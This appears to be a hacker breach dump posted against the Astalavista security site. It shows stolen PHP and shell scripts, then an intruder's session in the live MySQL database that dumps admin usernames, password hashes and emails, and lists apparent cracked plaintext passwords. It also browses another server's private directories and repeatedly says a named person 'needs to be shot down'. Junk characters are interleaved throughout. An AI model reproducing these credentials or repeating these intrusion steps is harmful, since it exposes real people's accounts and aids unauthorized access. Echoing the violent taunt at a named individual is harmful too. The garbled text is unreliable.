) K( E+ @ C" v+ V& r) a& m' E $xml = ‘<?xml version=”1.0″ encoding=”UTF-8″?>
( t( {# s }; e) Y& a' I1 |<rss version=”2.0″>" \! I$ l1 q! m& k
<channel>
: c0 d, y' H3 ] <title>ASTALAVISTA.com - Exploits</title>
, i6 x+ B3 e z! a8 O; F <link>http://www.astalavista.com/exploits</link>: ]6 P) n L) U/ |
<description>All availably Exploits.</description>
. L' M) H4 _+ K2 N& q <language>en-us</language>
" b* D8 Q t& C9 H <lastBuildDate>’ . date(’F, j M Y H:i:s O’) . ‘</lastBuildDate>. k0 [" v$ |! [, N: J$ y
<docs>http://blogs.law.harvard.edu/tech/rss</docs>
; f0 G0 @- H7 S% x8 q4 Q <generator>Astalavista.com</generator>
, |( q' t8 r$ B! F <webMaster>info@astalavista.com</webMaster>’ . $items . ‘8 U7 f; o. u' t) A: Y
</channel>, f l- p% [- Z. R, _5 y( p
</rss>’;. K0 K; V1 L1 I
4 m1 Z; Q; w( W' I9 I
if (file_exists(FULLPATH . ‘/feed/exploits.xml’)) {9 D! j& P) L. B$ h7 ^
unlink (FULLPATH . ‘/feed/exploits.xml’);9 V8 E- ~7 a2 n0 y5 C
}
h! \: ~3 {9 l c8 z' e
9 q5 t: Z) @ r3 ` file_put_contents(FULLPATH . ‘/feed/exploits.xml’, $xml);% ?! K6 J; {2 t+ l8 p" @( R* u
[snip]
: T# E; F' S( ]5 Q5 |8 U: z7 e7 W8 U) s2 d4 C
sh-3.2$ cat exploits.sh
0 B$ i% q7 q# _2 E3 Z' {#!/bin/sh3 A- D% ~6 C/ J. N" }- s @
# o" ]8 s7 q; W! ^# s- Q
###########################################################
7 e6 |9 [2 T. n5 @7 q% V& n8 M# #
% U$ `$ V% u% s# n* n% `( Y# Title: milw0rm exploits adder #
& ?+ [! w; ~' E6 N9 t- Z n: ^: B7 V# Description: Add all milw0rm exploits to the #$ \7 f" |! _" c
# Astalavista.com database #
0 F% \3 T) s( ^: O* g% x# #% \" D* w H& ^3 B$ Y6 f* y) ]
# Company: Astalavista Group #
( A u2 N) q# ?0 W# Author: Paulo M. Santos #, Q: r) A9 P' ~: C9 J5 q0 C1 L2 J
# E-Mail: 链接标记paulo.santos@astalavista.ch #6 m- ^$ H: y' W5 ]( ~
# #& U; M t* Q. i
###########################################################
& C7 F# M5 G& R/ ?# m7 x1 @0 M7 ]9 W$ |& W+ q8 _5 R
# path$ e2 v t7 ]! X) ^3 N" D! [% K% N
this_path=/home/com/public_html/modifications/cronjobs ^4 M' X1 O" L# m9 U! v$ m9 q$ f
. O5 ?, x7 R; r# change directory |0 ]& v7 K; h" i/ f
cd $this_path
* B6 E! ?" `/ T8 v% Ncd tmp/; E y" e9 p p
+ {, k6 c, s) i5 f1 d; \! G5 v# delete files* O$ a1 Z, ?6 e+ P( p
rm -rf milw0rm.tar.* &) Z8 f8 A3 G r# {8 m0 F
rm -rf milw0rm/ &/ e9 ~, _6 Y5 D6 e
6 U/ ^& K- ]6 H# u7 s; V/ Y
# wget milw0rm paket! N* j2 P2 D: Z$ I) b0 Z
wget 链接标记[url]http://www.milw0rm.com/sploits/milw0rm.tar.bz2[/url]
, D( ]$ n6 |; [! ^7 v) D) h
4 g6 X# J6 i) Z# extract milw0rm paket
k% p) T0 L. W' K$ L' y$ ]tar -xvf milw0rm.tar.bz24 z. z: X# o6 x/ R" {7 N7 c, g
2 V1 D3 E) i9 I9 v f
# change owner( @4 X. l' X, r3 @1 ]# \ C
chown -R com .
. D' s; [2 K$ lchgrp -R com .0 @$ ^/ T8 T; y9 ~, B8 R, Z5 Q
4 G4 A( L, y; a/ E: p# r
# execute php script4 V' z* p/ I! D7 t$ @1 j& `
cd $this_path
4 n* h( v* @5 U; D6 rphp -q exploits.php
: H: Y G! o) L7 v3 S) A; G4 C. N; G! c! Z, d. V% i" |) o( W
# delete files' E. W& ^& z1 m; r7 q5 D
rm -rf tmp/milw0rm.tar.*
; |; O, a) |* ~rm -rf tmp/milw0rm/) R9 X- ^* I% V* K2 `0 D
1 F$ h+ X5 \ T4 }2 i2 i; e( tsh-3.2$ echo “Paulo M. Santos needs to be shot down.”. t2 l) q# J" ?9 h- a: `) }
Paulo M. Santos needs to be shot down.1 @8 k& `- J+ J/ H$ B2 i
7 Q% b" f4 _7 I* D) @mysql -u contrexxuser2 -p
2 ?' o4 C# U: D" mEnter password:; F: f' s# n8 e9 B
Welcome to the MySQL monitor. Commands end with ; or \g.4 l1 J* F3 Z" r7 R5 t8 W
Your MySQL connection id is 261694. {* y T+ O! d5 \: f5 t
Server version: 5.0.45-community-log MySQL Community Edition (GPL)
3 \2 X4 Y5 y4 F; z) z- Q: ]9 S
! l9 P1 F& l, Z2 @7 |Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.5 l& [# C, Z6 g- m. {7 [' V% J
- I0 \6 Q) x" J3 h
mysql> show databases;& _, J1 f% `8 }% Q# Z9 w+ J
+——————–+. K( G2 @; Q; t, W
| Database |
5 _9 h: y. ]; ^0 `& Q, K5 ^3 y+——————–+
, w l% P( i/ M& f9 @, N| information_schema |
; C# }2 J: L+ @| com_contrexx2 |
# g7 q. g4 V, E| com_contrexx2_live |% D! [3 A0 O- O! u1 H2 H
| test |
" p6 q, H* l( @, ?7 W! M+——————–+
) a: F- h1 Q3 A* g' [1 X+ V3 K4 rows in set (0.00 sec)4 U. E1 [( h- U" @0 ]9 Y) R
3 P& R, D) [1 P. l6 v) K6 jmysql> use com_contrexx2_live
1 _' ~* I- M8 I, M- O& IDatabase changed
$ L# q0 t7 K$ V6 G; Bmysql> show tables;
& B; b: M. P. }6 M( {; n/ `: @) X+ B+————————————————–+4 y& d6 f; a4 A+ m5 [5 z
| Tables_in_com_contrexx2_live |5 B8 s: ^: i; V! |
+————————————————–+% Y3 T$ ]3 P( |+ t
| cc_banner_counter |
) K, E9 d' g; z6 q" J- K| cc_search_counter |
9 o. n& Q W" R5 T0 v+ B. U$ y" \- || contrexx_access_group_dynamic_ids |* N: I+ ?! r% ~
| contrexx_access_group_static_ids |7 _' Y; b, A0 E* d, w
| contrexx_access_rel_user_group |
8 G% ~& n9 U$ G- ~. B| contrexx_access_settings |+ R; b& R2 w5 ^9 N. n6 E% S8 b6 j
| contrexx_access_user_attribute |
, r$ b# U) U9 g8 _4 l| contrexx_access_user_attribute_name |
- M7 X' R: V% }; o% e6 J| contrexx_access_user_attribute_value |
& [. ]- S0 h* p6 B| contrexx_access_user_core_attribute |/ @2 ^ k3 P$ V- D9 q, d7 f
| contrexx_access_user_groups |
- l& c9 \$ F {| contrexx_access_user_mail |4 W3 ?& Z1 l$ D0 s( C
| contrexx_access_user_profile |
" Y* G+ j6 I, g7 e7 y$ R5 A| contrexx_access_user_title |
7 d& L( s, z ^3 N. A% P| contrexx_access_user_validity |
. M" ]) A% o1 w| contrexx_access_users |6 Y6 M1 q# Z l
| contrexx_backend_areas |6 ]# M7 V7 q$ W* D
| contrexx_backups |
1 s. H- S; Y+ K. t K, l+ B- o3 G| contrexx_content |9 p' _ x( b* l. v' I
| contrexx_content_history |8 r- g2 `) j8 a* w3 t; u" |0 {
| contrexx_content_logfile |" ]* B* I" f1 F5 _% Y* A
| contrexx_content_navigation |
0 j9 Z \7 h0 q s |2 r| contrexx_content_navigation_history |) l" y( J0 B# L9 v# r8 \* e. V
| contrexx_ids |
& Q3 V4 b! d) M6 P5 S& t# f0 c| contrexx_languages |
: v2 [# A% A! J# Z& ]) i| contrexx_lib_country |
1 r, t, v% V& K; ~% h| contrexx_log |, l& A0 X3 [4 `/ G. `
| contrexx_module_alias_source |
& Y- c: I, q( S4 A6 x| contrexx_module_alias_target |
' q8 _" I- [+ u4 L: r' v3 |& {: p| contrexx_module_block_blocks |
1 ~* @& ~- I0 t' o| contrexx_module_block_rel_lang |
+ p1 X! ^7 C" c8 \- I4 i| contrexx_module_block_rel_pages |1 m2 g8 d* j/ J5 x8 c
| contrexx_module_block_settings |/ X' p" c& B- _; v2 D
| contrexx_module_blog_categories |3 o& ^! f- y3 |/ Q9 w
| contrexx_module_blog_comments |" r2 W& |. M# j S& O* `( }
| contrexx_module_blog_message_to_category |8 }6 Q& P/ f, `* l% G) p. T9 ~
| contrexx_module_blog_messages |& y. f2 O) Y. [5 E
| contrexx_module_blog_messages_lang |% s3 W" P4 d/ k( t. Y2 R; |1 F1 K
| contrexx_module_blog_networks |7 [# L, M- p' n5 @7 B6 R3 A0 ]
| contrexx_module_blog_networks_lang |
, y6 B2 \9 B# i! r Y| contrexx_module_blog_settings |
6 z4 Z9 I0 ~: N/ T$ |+ \9 X| contrexx_module_blog_votes |
, ?$ v$ A6 S8 n% L2 D0 w| contrexx_module_calendar |3 `: U+ g! O9 E: c! d
| contrexx_module_calendar_access |
6 [- {) q) Q* J, g/ T2 U' p| contrexx_module_calendar_categories |
( [* l4 ?9 H7 C7 v* e, b| contrexx_module_calendar_form_data |3 u3 R5 k1 O/ H: h" A! \# T
| contrexx_module_calendar_form_fields |
8 H' A" U8 ~# M0 ?7 X| contrexx_module_calendar_registrations |+ f/ Q& ^+ S$ p: s; W' P
| contrexx_module_calendar_settings |/ |9 I/ E \0 L- `% ~
| contrexx_module_calendar_style |
$ {. R& N- P7 y. q* f| contrexx_module_contact_form |
j/ _$ C2 l" S6 K( j| contrexx_module_contact_form_data |
- N7 Z: d. E0 Q: f- y4 x. i6 N3 h| contrexx_module_contact_form_field |
' O. {+ k: R) `+ M$ ]4 l| contrexx_module_contact_settings |2 S$ K% g! p2 ?3 @% H
| contrexx_module_data_categories |
) m0 p6 Q1 M9 p3 h" w c- Z| contrexx_module_data_message_to_category |
5 `% z' V5 f8 K7 c D" c) [5 |) O| contrexx_module_data_messages |: v1 V- x) n r& ?) g- l/ f- A- m
| contrexx_module_data_messages_lang |
! s6 n- n' K! S$ f ^$ ]| contrexx_module_data_placeholders |: G+ @) \& n2 `% g) E8 |2 g
| contrexx_module_data_settings |
5 G8 ?* s) h; w* j+ P$ L| contrexx_module_directory_access |
- V6 b1 E) U9 R% |- R| contrexx_module_directory_categories |" \6 N8 J2 O( j& F4 |
| contrexx_module_directory_dir |. n; V1 P, D8 E8 D8 p
| contrexx_module_directory_inputfields |5 P/ F: c% z/ d, O% j7 W
| contrexx_module_directory_levels |3 `0 Z5 G- S$ B5 `9 |5 t
| contrexx_module_directory_mail |8 l' R8 j+ u) J6 ^' c9 \# \
| contrexx_module_directory_rel_dir_cat |
9 w- j/ {, S' J| contrexx_module_directory_rel_dir_level |
0 j5 r; g' e! T) p+ R6 f2 ^| contrexx_module_directory_settings |8 z7 N& [3 a t
| contrexx_module_directory_settings_google |
9 A3 j2 o# n1 D, z7 e+ q| contrexx_module_directory_vote |" \% b9 Y# I! L1 b+ ^+ U
| contrexx_module_docsys |5 q# O6 K' y& e* U( A, k1 w
| contrexx_module_docsys_categories |: Y4 t6 |( h, B# n* Z, z
| contrexx_module_egov_configuration |8 R7 d' w7 ?( N( c+ `$ ~( ~
| contrexx_module_egov_orders |
* i S$ s7 n6 u| contrexx_module_egov_product_calendar |
+ L) z& s6 N4 k4 y3 j| contrexx_module_egov_product_fields |! o t' u. q) U
| contrexx_module_egov_products |
. E8 K- S6 R+ p$ h3 o| contrexx_module_egov_settings |
- A3 ?, P) d' K| contrexx_module_exploits |/ h( V: |# Y5 ]9 I5 _; Q& x) C0 E
| contrexx_module_exploits_categories |
4 A: K. {/ C8 A9 l. N7 P0 o| contrexx_module_feed_category |
/ j' x5 v# z0 F. E) m| contrexx_module_feed_news |
; Z! k& }2 O' u. {* a| contrexx_module_feed_newsml_association |
0 V# O) _ e0 {| contrexx_module_feed_newsml_categories | k9 r/ P J( _" _" o4 K v$ q9 v
| contrexx_module_feed_newsml_documents |
% E3 V! p" r3 i$ o6 `| contrexx_module_feed_newsml_providers |
5 M) z( y- s7 k$ K| contrexx_module_forum_access |# K* T! W- i* [2 u" u+ ]% q
| contrexx_module_forum_categories |
/ d! m, N' V! w5 V9 @5 d; u2 _| contrexx_module_forum_categories_lang |7 P5 r6 k0 D) u
| contrexx_module_forum_notification |
" R0 N7 s8 s+ a$ ]+ }- X2 ]| contrexx_module_forum_postings |. ^6 S. B7 h# p V8 r
| contrexx_module_forum_rating |" j1 X# Y8 r, ~6 k9 y! c
| contrexx_module_forum_settings |3 C0 E1 U6 V q
| contrexx_module_forum_statistics |: u1 _2 O. _6 l, Q+ C
| contrexx_module_gallery_categories |" C% U2 x/ s* L. n3 N* n2 m
| contrexx_module_gallery_comments |
6 Q/ v! h$ u) N f+ q5 R m| contrexx_module_gallery_language |
% @& |) {0 l, O1 [5 [7 a1 f| contrexx_module_gallery_language_pics |
5 N. G$ H8 y) H _6 I| contrexx_module_gallery_pictures |
; W/ J7 @& f7 r+ a| contrexx_module_gallery_settings |
) f% u( g4 Q6 _+ @; n| contrexx_module_gallery_votes |1 m4 K! d w/ @& g" E
| contrexx_module_guestbook |
4 x- x# ^% h8 R8 U, R: E6 N| contrexx_module_guestbook_settings |3 p- C# c$ F) A2 j" g
| contrexx_module_livecam |
" Q: d9 Q$ y3 W2 w, f| contrexx_module_livecam_settings |
0 u5 U. G/ a0 a| contrexx_module_market |
- b; h+ U6 L j4 h% ?) _: d# b| contrexx_module_market_access |+ \. D/ ^( {6 F R7 u* _. t
| contrexx_module_market_categories |+ Y+ A& Q+ f; e( e* E' g8 b
| contrexx_module_market_mail |
: s7 ^# Q7 w+ e. n& o; c( ^| contrexx_module_market_paypal |
+ W2 @; @' }% {7 c: w| contrexx_module_market_settings |- a" d5 t6 C( \. |& {7 g0 A Q
| contrexx_module_market_spez_fields |
. e4 H4 D7 B4 B) o$ f, g! S| contrexx_module_mediadir_access | v1 f: X( }5 h/ I" k
| contrexx_module_mediadir_categories |
! f% h* |1 v0 Q8 ]) b; N/ u| contrexx_module_mediadir_comments |- q2 s$ K. O+ G' n6 D: j6 V1 D
| contrexx_module_mediadir_dir |" t2 D7 H* g& I$ \' l7 ~4 I
| contrexx_module_mediadir_inputfields |
) F% h8 n9 r, l, y/ q! T4 r- @| contrexx_module_mediadir_levels |. P7 X' d) L- h
| contrexx_module_mediadir_mail |
* d. \# Z( P# l; p. I& A| contrexx_module_mediadir_rel_dir_cat |4 k: n% N0 L0 ]* y3 B
| contrexx_module_mediadir_rel_dir_level |/ U! a' T: \) n( @
| contrexx_module_mediadir_reports |
9 o+ x1 a' K2 ~# v( y| contrexx_module_mediadir_settings |# U6 Z* T, F+ S3 ?( B
| contrexx_module_mediadir_settings_google |
! ^* m' ^% O3 _, {| contrexx_module_mediadir_vote |
- \* l# T- H0 a( O0 I- A3 ~ t# ^| contrexx_module_memberdir_directories |
* _- T) x0 W/ @7 Z1 P1 n| contrexx_module_memberdir_name |. g3 c+ |, \! X1 `: U! [
| contrexx_module_memberdir_settings | a% @$ L" r+ V$ N
| contrexx_module_memberdir_values |
/ a' V2 h" J! x% {& Q& g' u| contrexx_module_nettools_allowed_groups |
7 _" _7 W0 ~& ^4 U K2 O" @| contrexx_module_nettools_settings |
" \4 | A( K$ j| contrexx_module_news |4 Y8 K, t+ D/ o) W0 I1 z3 c
| contrexx_module_news_access |
1 t+ N2 F9 J. ]8 o' D+ g. }& ?6 ^1 o| contrexx_module_news_categories |
5 F! R! \ e: h| contrexx_module_news_settings |
$ e9 I, q. w: \1 A4 w| contrexx_module_news_teaser_frame |$ {% R Y; S) p2 Y X
| contrexx_module_news_teaser_frame_templates |
. E. W" l$ K# F0 u9 @5 e; B# `' t% B| contrexx_module_news_ticker |
/ B( L! G* p, I: _7 ?| contrexx_module_newsletter |
7 ]8 d' m7 f; }' }* }3 c2 B| contrexx_module_newsletter_attachment |% Q* O. w/ r0 @1 C2 [
| contrexx_module_newsletter_category |
9 m" N$ C8 ~" X" @3 ^' `| contrexx_module_newsletter_confirm_mail |
1 a. {1 V# ?8 v* P1 G$ q3 @; V| contrexx_module_newsletter_rel_cat_news |8 v* e: l9 l8 _
| contrexx_module_newsletter_rel_user_cat |
% I& W) [) ?; U$ l8 f% G| contrexx_module_newsletter_settings |
0 b( r$ A. J, K) d/ {| contrexx_module_newsletter_template |. ]. Q* P7 U9 X3 V
| contrexx_module_newsletter_tmp_sending |& {, g1 c- ^7 D7 t0 W
| contrexx_module_newsletter_user |
+ d2 g! c# X3 j$ ^| contrexx_module_newsletter_user_title |
5 @1 e/ f: ^ Y* W9 ?4 D; T| contrexx_module_onlinetools_defaultports |2 T1 B! }- J c& Z7 p0 Q- ` w6 J
| contrexx_module_onlinetools_defaultports_back |5 q! _% a+ o9 J8 b
| contrexx_module_onlinetools_geolitecity_blocks |5 J3 M$ u; L3 a3 t+ m8 n
| contrexx_module_onlinetools_geolitecity_country |
3 w- v4 E6 S3 B) W- ^| contrexx_module_onlinetools_geolitecity_location |
7 b* X- G5 c% R: b. r| contrexx_module_podcast_category |* \+ S; e5 a9 z0 p! T
| contrexx_module_podcast_medium |! d4 b5 \0 u" a9 b& M( W9 y
| contrexx_module_podcast_rel_category_lang |3 b* ~7 m1 l& ^
| contrexx_module_podcast_rel_medium_category | v- I3 z) t+ g; @$ |2 _" w+ X$ [
| contrexx_module_podcast_settings | P) Q- M5 ~2 \1 [" Q
| contrexx_module_podcast_template |' x* C$ K ~" g0 J9 d! K! V
| contrexx_module_proxydb |
/ \: ]5 p K9 Y; u& ]" k, {| contrexx_module_recommend |
) Q/ Y. U$ B. n# A| contrexx_module_repository |% @1 G1 i& @$ X
| contrexx_module_securitynews_cats |
2 C2 [) c! [) t| contrexx_module_securitynews_feeds |
9 a' Z0 P0 y# j' f" b8 Z| contrexx_module_securitynews_news |5 d6 o2 j! H: P7 N) D' S* w
| contrexx_module_shop_categories |1 P2 R7 o0 z! b
| contrexx_module_shop_config |6 h% _/ B7 |( F0 S! B
| contrexx_module_shop_countries |
- G" k) m$ o( k5 z& \8 W7 Z7 [| contrexx_module_shop_currencies |
% G2 m+ K" r* ~/ b; i| contrexx_module_shop_customers |
6 f7 T8 W6 a2 ^| contrexx_module_shop_importimg |4 \8 r9 Q% V) ]. j* [5 K
| contrexx_module_shop_lsv |) y: o- Y; ^' W+ u' P. N+ @# H
| contrexx_module_shop_mail |
, ?6 P3 j- _$ s7 T! n7 J| contrexx_module_shop_mail_content |# f/ i7 K: e: _7 h& ^
| contrexx_module_shop_manufacturer |
# _7 N0 g8 c0 B) [| contrexx_module_shop_order_items |
+ r1 b6 E: W$ |; X% h+ z, T| contrexx_module_shop_order_items_attributes |
' l4 N7 R0 J0 }/ Y| contrexx_module_shop_orders |: a' q2 K1 B8 e( F
| contrexx_module_shop_payment |
. ]; K2 o C4 @% G, \4 {0 X+ z| contrexx_module_shop_payment_processors |
. Q& G3 W: Z* W$ l( }0 `5 _* a* ?| contrexx_module_shop_pricelists |+ F: ?7 k0 M$ y; H0 ^ ~, A" k
| contrexx_module_shop_products |" w- v2 _5 z4 d; x+ Y
| contrexx_module_shop_products_attributes |8 T4 `+ o+ S+ j- S, q
| contrexx_module_shop_products_attributes_name |" l* g# Y; K, a7 h1 M8 F
| contrexx_module_shop_products_attributes_value |- u: [& ?0 x* A: G7 n+ t9 i7 n
| contrexx_module_shop_products_downloads |7 n& g# \! f4 j$ w9 A7 j. ^
| contrexx_module_shop_rel_countries |
6 Z- f# F! h7 o" L| contrexx_module_shop_rel_payment |
]6 `4 @0 T4 u- l7 ?! ]| contrexx_module_shop_rel_shipment |3 b5 p6 h K8 B2 Q
| contrexx_module_shop_shipment_cost |
5 d- D ^/ Q* G# ?| contrexx_module_shop_shipper |% Y0 C+ B) o0 f3 Q& a$ e. J% f
| contrexx_module_shop_vat |
; D! W) w g! B' e5 ~| contrexx_module_shop_zones |
7 `% |+ [" v1 i ~, Y" l. G8 o| contrexx_module_u2u_address_list |
/ P2 ^( E* d6 o8 `) O+ i `" m| contrexx_module_u2u_message_log |
. z! b! V; F3 e8 k| contrexx_module_u2u_sent_messages |
: P- o/ F7 e% s7 {: @ z| contrexx_module_u2u_settings |
* t# I$ v7 k8 S| contrexx_module_u2u_user_log |5 g7 Y1 p2 c# g
| contrexx_modules |2 {5 s& K d) ~) _' b5 L2 i5 C5 \
| contrexx_sessions |# z/ [ }# C0 I* a" \
| contrexx_settings |( ~, x" t( j% |: M& ]0 J1 P
| contrexx_settings_smtp |. k; c( l& u# Z; p, J
| contrexx_skins |
1 q. n* M C$ M5 Q( G# y/ K# i| contrexx_stats_browser |( z5 a1 }5 a& O3 l9 S
| contrexx_stats_colourdepth |
6 E1 N! I, P& T7 T& e| contrexx_stats_config |. @/ j" ~+ x0 J, d- U+ J. ~$ G% E
| contrexx_stats_country | }& L) Z% n$ R( h) t7 `9 ~0 ]9 U
| contrexx_stats_hostname |
' M# Z7 w8 J3 B4 d& d| contrexx_stats_javascript |
: F/ S' j- z& S1 f7 @, S| contrexx_stats_operatingsystem |
4 X$ C, X6 q/ y8 g1 C| contrexx_stats_referer |
/ X: E, i# K2 N1 c| contrexx_stats_requests |
# R; `9 V6 ^ n$ X| contrexx_stats_requests_summary |
" y3 h7 A$ P9 y, {. I$ `) z$ J| contrexx_stats_screenresolution |
+ c, w8 b! }* N- X' ]8 C4 o| contrexx_stats_search |' B, J6 W$ M6 _: Y+ D4 ^+ F9 z! s$ `
| contrexx_stats_spiders |
- w8 c! N' E8 O2 k| contrexx_stats_spiders_summary |
: ]# @6 h, u/ F. |/ g" F| contrexx_stats_visitors |
$ q' p9 G6 i" t1 L/ G| contrexx_stats_visitors_summary |
. A* i; [" i0 B| contrexx_voting_additionaldata |0 u3 ~" a0 `- R' H
| contrexx_voting_email |2 I' I+ m; _4 M
| contrexx_voting_rel_email_system |
# B9 {' U! ^& w8 C8 `1 d7 v. ]" z| contrexx_voting_results |0 X9 Q: L9 C2 t$ [3 h1 X! h
| contrexx_voting_system |
6 z. W: I" R: o0 w| foo |
a$ c, T! k- o4 |$ ~. S- `7 {+————————————————–+
' l) s0 D b$ t3 ]7 `% e N227 rows in set (0.01 sec)
3 }3 [/ y& P. d3 ?! u' q) R
9 o) @: J& g. Zmysql> select count(*) as skids from contrexx_access_users;; y& M' P6 d8 d# k
+——-+
: j/ @+ \1 E/ |2 }( L0 Z| skids |
7 }4 t; c+ C! m+——-+* K, N h9 n" Z/ ]8 D- G/ m6 l
| 53699 |. J$ u- Q& }7 S1 k
+——-+
+ Y5 L( R" {2 @) w7 i! @* G A5 X1 row in set (0.00 sec)" v; A7 n3 U Y3 ^( J$ h. ~
4 S; w. ?* x. l6 m/ smysql> describe contrexx_access_users;
, Y$ m1 x6 u% M6 P+——————+——————————————+——+—–+————–+—————-+# B/ r/ ]% X# e. a
| Field | Type | Null | Key | Default | Extra |- \4 c3 D% Q0 ?# u! A" }
+——————+——————————————+——+—–+————–+—————-+, ~) z+ G8 t r" @" G& o' O
| id | int(10) unsigned | NO | PRI | NULL | auto_increment |) {* z: ~: w S* N: y
| is_admin | tinyint(1) unsigned | NO | | 0 | |! ?) Z1 X1 N& G1 V
| username | varchar(40) | YES | MUL | NULL | |0 W+ k7 c% Y& G* j+ I$ u
| password | varchar(32) | YES | | NULL | |. ~2 o5 E2 p$ Q4 W$ t- u6 z
| regdate | int(14) unsigned | NO | | 0 | |
. {+ ^. M o8 V0 r$ Y* p| expiration | int(14) unsigned | NO | | 0 | |( U! f. u0 H& n0 F6 l' c3 r
| validity | int(10) unsigned | NO | | 0 | |
. G, a% [7 B4 [8 }% j8 f. |* f| last_auth | int(14) unsigned | NO | | 0 | |
6 R: L. N9 B' c/ v# {| last_activity | int(14) unsigned | NO | | 0 | |# N5 m, U5 A4 s/ @' Q' N& Z. H
| email | varchar(255) | YES | | NULL | |
2 h7 M8 K$ M1 j6 B| email_access | enum(’everyone’,'members_only’,'nobody’) | NO | | nobody | |4 m8 P" C. o. B+ a5 R$ F! ]+ x: Q
| frontend_lang_id | int(2) unsigned | NO | | 0 | |
' h+ D3 @/ L6 b5 w0 C6 d$ P| backend_lang_id | int(2) unsigned | NO | | 0 | |
% v6 q0 Z9 F; V; W8 w$ Y/ u9 d| active | tinyint(1) | NO | | 0 | |. ^& Z% A( y6 |0 G
| profile_access | enum(’everyone’,'members_only’,'nobody’) | NO | | members_only | |
; k& W5 }7 \% P" v| restore_key | varchar(32) | NO | | | |
+ D" d$ g$ a) n8 Q| restore_key_time | int(14) unsigned | NO | | 0 | |
! ?/ _. z7 C, ], N1 G| u2u_active | enum(’0′,’1′) | NO | | 1 | |
8 D" j( R9 U+ I+ `5 o( N; Q+——————+——————————————+——+—–+————–+—————-+
/ A! V! D Q1 W6 H: v2 j( n# [18 rows in set (0.00 sec)2 c! Y/ ]2 Q) K* s* S
( b7 g( F9 \4 f; pmysql> select username,password,email from contrexx_access_users where is_admin = 1;2 [) I- L+ P$ z5 y
+————+———————————-+—————————–+; U8 E( a/ L' Z" C
| username | password | email |
8 R# w2 ~ s# V4 E( C+————+———————————-+—————————–+; V$ z) j1 r7 j
| system | 0defe9e458e745625fffbc215d7801c5 | 链接标记info@comvation.com | W/ A' [4 V$ d" |# d; e u
| prozac | 1f65f06d9758599e9ad27cf9707f92b5 | 链接标记prozac@astalavista.com |' |# ~, r: R% G' e8 {7 c. A# U
| Be1er0ph0r | 78d164dc7f57cc142f07b1b4629b958a | 链接标记paulo.santos@astalavista.ch |/ b# O: _+ l" J% ]
| schmid | 0defe9e458e745625fffbc215d7801c5 | 链接标记ivan.schmid@comvation.com |
}' o0 @) M( N, k+————+———————————-+—————————–+7 l8 C% A& V6 Z
4 rows in set (0.04 sec)& I9 Q1 b- D% h8 ^: Y2 {, W' H# u
* K. N/ g4 T; g: e* B4 S4 Y" @mysql> exit;
. N0 c r+ h( j# sBye1 c3 v, z# B( M) a
) f- E" |3 J5 [0 p
[~] There you go, your “team of security and IT professionals” is a joke., M3 ^" j$ S' G- p0 j
+ ]4 D6 z8 v0 q+ j+——————————+
7 G4 @' o- P1 u6 C; i& R* Z" _system:f82BN3+_*/ E: g3 ]. Z b& q. [, @3 J5 ^
Be1er0ph0r:belerophor4astacom
* h0 k- P* }' N, ?& hprozac:asta4cms!) W) [. m, T T, Z6 u% C! I
commander:mpbdaagf6m2 I( Y2 l- B. |6 I
sykadul:ak29eral
. h# Q3 @# M1 F+ V9 l+——————————+" u5 Q# N* [ `9 o$ D
8 q3 m: F0 D3 K5 h. t2 {7 s
[~] Paulo M. Santos AKA Be1er0ph0r needs to be shot down for his milw0rm ripping script(s)
6 R" f* a/ K- H/ C* Q0 ~…and the others, find another area to get paid from, security isn’t for sale and you obviously fail at it.$ K+ \/ y) {% W$ `6 k Q: ?) T
% E0 k2 s3 P, D, \% T3 g[~] Lets move to astalavista.net now,/ C, v' R9 U. e
a8 I7 R9 u9 f: o: ZFrom <链接标记[url]https://www.astalavista.net/[/url]>:
% [* A3 A7 ^+ Y% |) }>> Everyone knows that the best defense is a good offense.
" p( p" f% {- w: o# B& ?>> Those who wait for their foes to find a security loophole are opting for the wrong strategy.6 Q, H/ J y& B, x. ~
>> The ASTALAVISTA hacking & security community is the largest IT security community in the world.
; _4 V! U" l" r>> It.s a platform for both IT specialists and novices, and anyone interested in expanding and updating their knowledge regarding IT security and hacking.”
d/ H( w1 G% Q3 h% s! }% |$ `! r5 m5 p
>> Go ahead, try and hack our server . in a completely legal way!
& L; {0 d' ]$ L/ C>> Learn by doing: We offer our members tricky tasks and challenges on an
! T) |* g# O: B( e>> ongoing basis so you can test your knowledge and abilities. You can also. x, S$ [7 a% d% S+ @- b0 F5 |
>> demonstrate what you.ve mastered by taking part in regular hacker contests
- q1 T. W' H- r>> and war games& s0 Q7 q: d6 U
4 `2 k. X+ Y2 b2 T[~] Lets take a look there, after all… they are hack-proof, aren’t they?!
^; H# y# ]2 ]6 f1 S3 u9 w1 J0 C+ f
[-] Tricky task: Find home dir of astalavista.net% z9 q5 @& {' I) H0 |( r
) P* V$ X3 Q8 Q; J% V; Csh-3.2$ ls -la ~astanet5 T5 e4 l9 p- G
total 48
1 c" P5 P8 [$ y; `( _6 G) Y2 Idrwx–x–x 6 astanet astanet 4096 Dec 23 15:55 .
* x! @2 }9 W- jdrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..; M4 K7 @4 e7 W
drwxr-xr-x 2 root root 4096 Dec 23 16:00 auth
' I i0 |1 H3 t6 j1 n) \-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history
/ @% b1 }" h$ x2 A3 H' ?) |/ }8 D P-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout
( B& B+ W" h8 n# d# l-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile
8 z; B) _& T- y% L2 u4 p. s/ N1 L-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc
, K, L. t) b2 T5 b7 ~drwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains
0 X# {+ H- n9 x- `drwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap" [. J- T; h, @2 m+ k+ x0 n
drwx—— 2 astanet astanet 4096 Dec 23 12:18 mail
4 u& Q5 ?7 M' k9 Wlrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html
' Y, s( X& F/ N* A" d5 M' B-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow
3 ^* a5 O! o+ F! V% s K/ o- M6 y: e- a+ I8 S+ w
sh-3.2$ cd /home/astanet/domains/astalavista.net/private_html/
7 h+ d8 I" S9 b4 `9 Y4 n! b& s% msh-3.2$ ls -la
) C# P) @$ @+ p' O' i, [total 200
